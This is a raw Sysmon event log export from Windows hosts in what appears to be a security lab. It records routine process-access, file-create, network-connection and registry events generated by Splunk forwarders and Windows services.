14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044394Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044393Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044392Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044391Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044390Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044389Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044388Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044387Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E35B-6299-0500-000000006002}412528C:\Windows\system32\csrss.exe{0A5DF930-184C-629A-2107-000000006002}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044386Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.607{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-184C-629A-2107-000000006002}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044385Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.609{0A5DF930-184C-629A-2107-000000006002}4024C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.2.5Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=40AB9FBBAEDDA47FD9B0A2EC5E183B97,SHA256=8A7CB60452D38C258714CE37C2C490E78007A9E4F4F9A94B270BDBA59FA8F1AE,IMPHASH=35240A25EDE7EC5A65BF627E57E772B9{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044384Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.216{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0286C4D75F2F212753EB6681F079036D,SHA256=DE0BD8D7DA0823344A275B50534F467F70693C995ABA1620D482C9E4FE17AF3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:52.091{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9857D1FA9EED756A61DBBD87C0B9393,SHA256=F0F0B102803D9928A7B7388E77E1FC5D3364FC905EF7BBAF7AB483E140D70003,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044398Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:53.310{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D6799B7BB0D39047F5C534708AA6EA0,SHA256=F846F7335BC49B6D966F27B9492C6214869774C3544D91D5AE2D5BE9E0D323AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:53.121{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D662149D22143CF697711A9BCDF1453,SHA256=3C3AA088965835C04920233EAD0992A658714E559DF92D764C770671C358C616,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044400Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:52.743{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52353-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044399Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:54.404{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41EA1AB361496C553A165804D77EE9A8,SHA256=3A866ABC01191422D2BE6904732F9D6CD8646EB8E18A6954F1F1968BC5EC95B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:54.239{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B5D479782EF9A7F317194644DB80B75,SHA256=F1E98E2FB79E5371A1377BC3617ED5D2F786D82694B3607F22CB92C176E2B58D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044401Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:55.498{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B27340EB61E1C1947111987EB0D5AEF8,SHA256=151BFE7BAFDFF6360F15CCA83515B1E82591BD8DDF5EFD69F5DF4E1A00CD0B81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:55.342{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D598AC77035E08484D093EB3A98B4FC,SHA256=5C6C490B37B011ECCC171AC867C9E5E63C394E078ED9F021AC45806DF5F8FDF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044402Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:56.595{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44C54E660251847AE5A1844DA5ABA1D7,SHA256=D65C02A9784880DCA57CF450F42575F9F1FE54CF94E71B179E2E959D5E53ADCA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000205445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:54.751{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56383-false10.0.1.12-8000- 23542300x8000000000000000205444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:56.441{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97B22A53ECDA08B5BB92CC399AB497EA,SHA256=9090FEC9F4151F45B4C10C86F58E090F8BECD6D7E4C198959C41DA38C72729F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044403Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:57.685{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126307848C537EE0E0A1E8CC8B728701,SHA256=4D57FF3E8C54816633249462765D35E5B3DBD5A82DDBED8FC846B5BA26AD80F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:57.559{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE6C87C033CA66687AB18E1368366F65,SHA256=06350DBF7E2272179DD34FA866BF2F6EA1CC3E9A800E5DC061EE284E84C34030,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044404Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:58.779{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=267C40CE04C9324B948D65CAC2E7C762,SHA256=84FE28DDAE2ACE3DBE2DB25E3240DBEC21187D7EC5FB9F6DF1A5C7FB928EBB7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:58.594{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE462EA355CFFEDD17E48CFD79434DAF,SHA256=73729606EC0D1E286BA33C21645F62C78229EEB0A4DF101E466CD4617C299EC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044405Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:59.873{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF2B89FE657E9D480F62B8882F003A10,SHA256=178B14B6E3982261E7B4C43AADFFFD80EB4C4763C0A925F9A641D2D0EFDBBB40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:59.624{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9D5A1842C22FA869396E63A1979CE3E,SHA256=2A08E614881569864D28C20123E7EF2DB45497060DE2DF7246AA01B32DADF8B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044407Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:19:00.966{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47F0B75E56C9FB8D04FBCEABDCC7E72B,SHA256=8E784C8E3B8445D3D275CC3C62AA789A3E49DE7C37C3982DD9F19BF8D7BE8E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:00.823{2E1864BB-E13E-6299-1100-000000005F02}404NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=4D7BB81EBBAD33D778D64778BE3E5298,SHA256=6242C968CB644756DBD408DB6FCF82F94004AE28F6DA2AF438A14C4A96377EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:00.657{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0102A989CD4D237171EDDB66C8C5000D,SHA256=798C867A62A80187D697A3CF3751E73DF67AD1944232FC2A611977DA8F192810,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000044406Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:18:57.821{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52354-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000205452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:59.818{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56384-false10.0.1.12-8000- 23542300x8000000000000000205451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:19:01.707{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F016BF570660734455678EDC37E3D55,SHA256=1632F3BF7145A2C7F0456F603ADF830F3EA84FCADB37330E8B458EA282EBA8A2,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000044417Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000044416Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00cefca5) 13241300x800000000000000044415Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8774c-0x7d24a07f) 13241300x800000000000000044414Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87754-0xdee9087f) 13241300x800000000000000044413Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8775d-0x40ad707f) 13241300x800000000000000044412Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000044411Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x00cefca5) 13241300x800000000000000044410Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d8774c-0x7d24a07f) 13241300x800000000000000044409Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d87754-0xdee9087f) 13241300x800000000000000044408Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-SetValue2022-06-03 14:19:01.826{0A5DF930-E35B-6299-0B00-000000006002}628C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d8775d-0x40ad707f) 